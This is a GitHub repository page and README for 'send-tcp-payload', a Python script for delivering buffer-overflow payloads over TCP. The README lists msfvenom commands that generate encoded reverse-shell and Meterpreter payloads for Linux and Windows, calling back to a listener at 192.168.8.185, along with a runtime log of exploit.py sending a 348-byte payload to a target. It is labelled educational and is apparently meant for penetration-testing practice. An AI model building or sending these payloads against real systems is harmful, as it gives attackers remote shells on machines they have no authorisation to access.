https://github.com/ivan-sincek/send-tcp-payload
Send a payload through TCP.
https://github.com/ivan-sincek/send-tcp-payload
buffer-overflow ethical-hacking networking offensive-security payload penetration-testing python red-team-engagement security tcp
Last synced: 8 months ago
JSON representation
Send a payload through TCP.
- Host: GitHub
- URL: https://github.com/ivan-sincek/send-tcp-payload
- Owner: ivan-sincek
- License: mit
- Created: 2020-07-13T11:28:03.000Z (about 5 years ago)
- Default Branch: master
- Last Pushed: 2023-04-27T20:45:38.000Z (over 2 years ago)
- Last Synced: 2024-10-17T16:21:18.322Z (12 months ago)
- Topics: buffer-overflow, ethical-hacking, networking, offensive-security, payload, penetration-testing, python, red-team-engagement, security, tcp
- Language: Python
- Homepage:
- Size: 3.91 KB
- Stars: 0
- Watchers: 2
- Forks: 2
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# Send TCP Payload
Send a payload through TCP.
Tested on Kali Linux v2023.1 (64-bit).
Made for educational purposes. I hope it will help!
## How to Run
**Change the IP address, port number, and payload inside the scripts as necessary.**
Open your preferred console from [/src/](https://github.com/ivan-sincek/send-tcp-payload/tree/master/src) and run the following Bash command:
```fundamental
python3 exploit.py
```## JMP ESP
To do.
## Generate a Reverse Shell Payload
To generate a reverse shell payload for `Linux OS`, use one of the following MSFvenom commands (modify them to your need):
```fundamental
msfvenom --platform linux -a x86 -e x86/shikata_ga_nai -p linux/x86/shell_reverse_tcp LHOST=192.168.8.185 PORT=9000 EXITFUNC=thread -f python -b \x00\x0a\x0d\xffmsfvenom --platform linux -a x64 -e x64/xor -p linux/x64/shell_reverse_tcp LHOST=192.168.8.185 PORT=9000 EXITFUNC=thread -f python -b \x00\x0a\x0d\xff
msfvenom --platform linux -a x86 -e x86/shikata_ga_nai -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.8.185 PORT=9000 EXITFUNC=thread -f python
msfvenom --platform linux -a x64 -e x64/xor -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.8.185 PORT=9000 EXITFUNC=thread -f python
```To generate a reverse shell payload for `Windows OS`, use one of the following MSFvenom commands (modify them to your need):
```fundamental
msfvenom --platform windows -a x86 -e x86/shikata_ga_nai -p windows/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f python -b \x00\x0a\x0d\xffmsfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f python -b \x00\x0a\x0d\xff
msfvenom --platform windows -a x86 -e x86/shikata_ga_nai -p windows/meterpreter_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f python
msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f python
```## Runtime
```fundamental
โโโ(root๐kali)-[~/Desktop]
โโ# python3 exploit.py
Connecting to the target 192.168.8.185:9000
Sending the payload... Size in bytes: 348Waiting for the response...
Waiting for the response timed out
No response has been received or is empty
```